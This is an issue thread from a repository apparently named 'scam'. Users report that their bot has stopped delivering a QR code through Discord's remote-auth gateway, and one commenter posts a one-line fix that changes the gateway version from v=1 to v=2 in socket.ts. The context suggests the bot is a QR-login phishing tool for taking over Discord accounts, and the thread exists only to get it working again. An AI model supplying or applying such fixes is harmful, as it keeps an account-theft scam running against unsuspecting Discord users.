### ISSUE TITLE
QR patched

### ISSUE THREAD

**Issue by maxencefiu** [ulnk/scam#34]
Hello.
I think this is patched, the bot currently not sending the QR since 1 day.
Thanks

**Comment by NexIsHot** [comment]
Vouch, this guy is right.

**Comment by maxencefiu** [comment]
> Vouch, this guy is right.

You found any solution ?

**Comment by NexIsHot** [comment]
Sadly no, is it still patched ?

**Comment by NexIsHot** [comment]
Sadly no, is it still patched ?

**Comment by NexIsHot** [comment]
> > Vouch, this guy is right.
> 
> You found any solution ?

( i didnt really tried to find one)

**Comment by knockstick** [comment]
I found the fix!

Go to \src\discord\util, open socket.ts file, and change this line:

```const socketClient = new WebSocket(`wss://remote-auth-gateway.discord.gg/?v=1`, { origin: 'https://discord.com', handshakeTimeout: 10000 });```

to this line:

```const socketClient = new WebSocket(`wss://remote-auth-gateway.discord.gg/?v=2`, { origin: 'https://discord.com', handshakeTimeout: 10000 });```

Then run the bot and try to use it
